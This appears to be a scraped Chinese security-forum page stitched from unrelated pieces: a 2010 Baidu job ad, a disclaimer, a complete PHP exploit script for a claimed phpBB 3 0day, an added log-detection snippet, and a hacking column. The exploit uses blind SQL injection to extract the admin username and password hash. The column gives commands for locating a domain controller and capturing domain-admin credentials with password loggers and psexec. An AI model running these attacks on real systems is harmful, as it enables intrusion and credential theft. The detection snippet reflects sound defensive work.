
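[Hiring] Baidu is recruiting Web front-end R&D engineers

  • Location: Beijing
  • Years of experience: no requirement
  • Job category: Front-end engineer
  • Posted: 2010/6/13
  • Closing date: 2010/12/31
  • Source: Lion

Job description
- Design, develop and implement Web-side features for Baidu product lines;
- Improve the interaction experience of Baidu product interfaces and optimize their performance;
- Research and build up knowledge of cutting-edge Web technologies.

Requirements
- Bachelor's degree or above in computer science or a related field;
- Expert in Web development technologies such as JavaScript and Ajax;
- Expert in page-building technologies such as HTML/XHTML and CSS, and familiar with page architecture and layout;
- Familiar with W3C standards, with a deep understanding of separating presentation from data, Web semantics, and so on;
- Proficient with Linux, with a grasp of algorithms, data structures and back-end development (PHP/Java, etc.);
- Strong interest in Internet products and Web technology, good learning ability and strong drive;
- Good communication and presentation skills, clear thinking, and strong hands-on and logical-analysis ability.

Contact
E-mail: stsr@baidu.com
(Tip: for better results, we suggest noting that you came from 博客园 (cnblogs) when submitting your résumé.)
Phone: 86-10-5992 5418
Mobile: 13164234669
Contact person: Mr. Zou
Company address: No. 10 Shangdi 10th Street, Haidian District, Beijing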

 


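非安全中国网 disclaimer:
1. All statements and images in this post are solely the personal opinion of the poster and have nothing to do with this site's position;
2. This topic was posted by 悟空ing; the poster 悟空ing complies with the six management rules of the "Copyright and Disclaimer" statement and enjoys the related rights;
3. Other organizations or individuals must obtain the consent of the poster 悟空ing and of this site before using, reposting or quoting this post;
4. Parts of this post are reposted from other media and published on this site in order to pass on more information; this does not mean that this site agrees with their views or is responsible for their accuracy;
5. If this post infringes the copyright of your site or of any individual, please notify this site immediately; this site will delete it promptly and offer its deepest apologies;
6. The administrators and moderators of this site have the right to delete this post without notifying the poster in advance.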

Truly a case of "gazing at the job posting and sighing".

What I studied really has turned out to be a tragedy.

phpBB 3.0 0day vulnerability released

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\r\n";
echo "by Hackerz5 hackerz5x@yahoo.com\r\n";
echo "site: http://hackerz5.com\r\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\r\n\r\n";
/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/
if ($argc<5) {
    echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
    echo "host: target server (ip/hostname)\r\n";
    echo "path: path to phpbb3\r\n";
    echo "user/pass: u need a valid user account with global moderator rights\r\n";
    echo "Options:\r\n";
    echo " -T[prefix] specify a table prefix different from default (phpbb_)\r\n";
    echo " -p[port]: specify a port other than 80\r\n";
    echo " -P[ip:port]: specify a proxy\r\n";
    echo " -u[number]: specify a user id other than 2 (admin)\r\n";
    echo " -x: disclose table prefix through error messages\r\n";
    echo "Example:\r\n";
    echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
    echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\r\n";
    die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

// hex + printable dump of a string, 15 bytes per row (debug helper)
function quick_dump($string)
{
    $result='';$exa='';$cont=0;
    for ($i=0; $i<=strlen($string)-1; $i++)
    {
        if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
        {$result.=" .";}
        else
        {$result.=" ".$string[$i];}
        if (strlen(dechex(ord($string[$i])))==2)
        {$exa.=" ".dechex(ord($string[$i]));}
        else
        {$exa.=" 0".dechex(ord($string[$i]));}
        $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
    }
    return $exa."\r\n".$result;
}

$proxy_regex = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5})';

// send a raw HTTP request (directly or through the proxy) and store the response in $html
function sendpacketii($packet)
{
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy=='') {
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
            echo 'No response from '.$host.':'.$port; die;
        }
    }
    else {
        $c = preg_match($proxy_regex,$proxy);
        if (!$c) {
            echo 'Not a valid proxy...';die;
        }
        $parts=explode(':',$proxy);
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) {
            echo 'No response from proxy...';die;
        }
    }
    fputs($ock,$packet);
    if ($proxy=='') {
        $html='';
        while (!feof($ock)) {
            $html.=fgets($ock);
        }
    }
    else {
        $html='';
        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
            $html.=fread($ock,1);
        }
    }
    fclose($ock);
    #debug
    #echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
    $temp=$argv[$i][0].$argv[$i][1];
    if ($temp=="-p")
    {
        $port=str_replace("-p","",$argv[$i]);
    }
    if ($temp=="-P")
    {
        $proxy=str_replace("-P","",$argv[$i]);
    }
    if ($temp=="-T")
    {
        $prefix=str_replace("-T","",$argv[$i]);
    }
    if ($temp=="-u")
    {
        $user_id=str_replace("-u","",$argv[$i]);
    }
    if ($temp=="-x")
    {
        $discl=1;
    }
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

// log in with the supplied account and collect the session cookies
$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
    $temp2=explode(" ",$temp[$i]);
    $cookie.=" ".$temp2[0];
}
if (eregi("_u=1;",$cookie))
{
    //echo $html."\r\n";//debug
    //die("Unable to login...");
}
echo "cookie -> ".$cookie."\r\n";

// -x: read the table prefix out of the SQL error message
if ($discl)
{
    $sql="'suntzuuuuu";
    echo "sql -> ".$sql."\r\n";
    $sql=urlencode(strtoupper($sql));
    $data="username=";
    $data.="&icq=";
    $data.="&email=";
    $data.="&aim=";
    $data.="&joined_select=lt";
    $data.="&joined=";
    $data.="&yahoo=";
    $data.="&active_select=lt";
    $data.="&active=";
    $data.="&msn=";
    $data.="&count_select=eq";
    $data.="&count=";
    $data.="&jabber=";
    $data.="&sk=c";
    $data.="&sd=a";
    $data.="&ip=".$sql;
    $data.="&search_group_id=0";
    $data.="&submit=Search";
    $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Connection: Close\r\n";
    $packet.="Cookie: ".$cookie."\r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);
    if (strstr($html,"You have an error in your SQL syntax"))
    {
        $temp=explode("posts",$html);
        $temp2=explode(" ",$temp[0]);
        $prefix=strtoupper($temp2[count($temp2)-1]);
        echo "prefix -> ".$prefix."\r\n";sleep(2);
    }
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
    for ($i=0; $i<=255; $i++)
    {
        if (in_array($i,$md5s))
        {
            $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
            echo "sql -> ".$sql."\r\n";
            $sql=urlencode(strtoupper($sql));
            $data="username=";
            $data.="&icq=";
            $data.="&email=";
            $data.="&aim=";
            $data.="&joined_select=lt";
            $data.="&joined=";
            $data.="&yahoo=";
            $data.="&active_select=lt";
            $data.="&active=";
            $data.="&msn=";
            $data.="&count_select=eq";
            $data.="&count=";
            $data.="&jabber=";
            $data.="&sk=c";
            $data.="&sd=a";
            $data.="&ip=".$sql;
            $data.="&search_group_id=0";
            $data.="&submit=Search";
            $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
            $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
            $packet.="Host: ".$host."\r\n";
            $packet.="Content-Length: ".strlen($data)."\r\n";
            $packet.="Connection: Close\r\n";
            $packet.="Cookie: ".$cookie."\r\n\r\n";
            $packet.=$data;
            sendpacketii($packet);
            if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
        }
        if ($i==255) {die("Exploit failed...");}
    }
    $j++;
}
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
    for ($i=0; $i<=255; $i++)
    {
        $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
        echo "sql -> ".$sql."\r\n";
        $sql=urlencode(strtoupper($sql));
        $data="username=";
        $data.="&icq=";
        $data.="&email=";
        $data.="&aim=";
        $data.="&joined_select=lt";
        $data.="&joined=";
        $data.="&yahoo=";
        $data.="&active_select=lt";
        $data.="&active=";
        $data.="&msn=";
        $data.="&count_select=eq";
        $data.="&count=";
        $data.="&jabber=";
        $data.="&sk=c";
        $data.="&sd=a";
        $data.="&ip=".$sql;
        $data.="&search_group_id=0";
        $data.="&submit=Search";
        $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
        $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
        $packet.="Host: ".$host."\r\n";
        $packet.="Content-Length: ".strlen($data)."\r\n";
        $packet.="Connection: Close\r\n";
        $packet.="Cookie: ".$cookie."\r\n\r\n";
        $packet.=$data;
        sendpacketii($packet);
        if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
    }
    if ($i==255) {die("Exploit failed...");}
    $j++;
}
echo "--------------------------------------------------------------------\r\n";
echo "admin -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
function is_hash($hash)
{
    if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
    else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>
Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.
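
Added example, not part of the original post: a web-log check for the request shape the script above sends, namely a memberlist.php request with mode=searchuser whose `ip` query parameter is not an IP address, hostname or wildcard pattern. The log lines, the function name `suspicious_searches` and the allowed-character rule are assumptions made for this illustration; payloads carried only in a POST body do not appear in a standard access log.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not from a real server.
SAMPLE_LOG = """\
198.51.100.7 - - [13/Jun/2010:10:00:01 +0800] "POST /phpbb3/memberlist.php?joined_select=lt&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser HTTP/1.0" 200 5120
198.51.100.7 - - [13/Jun/2010:10:00:03 +0800] "POST /phpbb3/memberlist.php?joined_select=lt&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser HTTP/1.0" 200 5120
203.0.113.20 - - [13/Jun/2010:10:01:10 +0800] "GET /phpbb3/memberlist.php?mode=searchuser&ip=192.0.2.44 HTTP/1.1" 200 7300
203.0.113.20 - - [13/Jun/2010:10:01:15 +0800] "GET /phpbb3/viewtopic.php?t=12 HTTP/1.1" 200 9100
"""

# client, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Assumption: a legitimate search value is an IP, a hostname or a wildcard
# pattern, so only letters, digits, '.', ':', '*' and '-' are expected.
SAFE_IP_VALUE = re.compile(r'^[A-Za-z0-9.:*-]*$')


def suspicious_searches(log_text):
    """Count, per client, member-search requests whose ip parameter holds
    characters that never occur in an address or hostname."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, _method, target, _status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/memberlist.php"):
            continue
        # parse_qs percent-decodes, so %5C%27 is compared as backslash + quote
        params = parse_qs(url.query, keep_blank_values=True)
        if "searchuser" not in params.get("mode", []):
            continue
        if any(not SAFE_IP_VALUE.match(v) for v in params.get("ip", [])):
            hits[client] += 1
    return hits


if __name__ == "__main__":
    for client, count in suspicious_searches(SAMPLE_LOG).most_common():
        print(f"{client}: {count} member searches with a non-address ip value")
```

Because the script extracts one character per successful request, a single client producing many such hits within minutes is the pattern to alert on.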


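How to find the primary domain server on an internal network

When facing an internal network built on a domain structure, many beginners may have no experience with how to penetrate it. If you can get the primary domain administrator's password, you can move freely through the whole internal network. The primary domain administrator usually stays on relatively important machines; if you can take one or several of them and plant something like a password logger, I believe that sooner or later you will get the password. The primary domain server is of course the most important of these machines. How do you tell which one it is among thousands of machines? A DOS command such as

    net group "domain admins" /domain

can serve as one criterion, but VBS can do it too. This still belongs to the ADSI part, and the code is as follows:

    set obj=GetObject("LDAP://rootDSE")
    wscript.echo obj.servername

These two lines of code are enough; run

    cscript 3.vbs

and you will get a result. Of course, whether it is the DOS command or the VBS, the prerequisite is that you are running with domain-user privileges. For example, if you have obtained a domain user's account and password, you can use the form psexec.exe -u -p cmd.exe to get a shell as that domain user; or, if your trojan already interacts with the desktop and the user logged in to your trojan's shell is a domain user, you can run these commands directly.

The role of VBS in intrusion is of course not limited to this, and JS or other tools can also implement the functionality of my code above; but the topic set for this column is the clever uses of VBS in hacking, so we only talk about VBS. After finishing this VBS part, the other authors and I will go on to plan other topics in future columns, and try to bring readers good, useful articles.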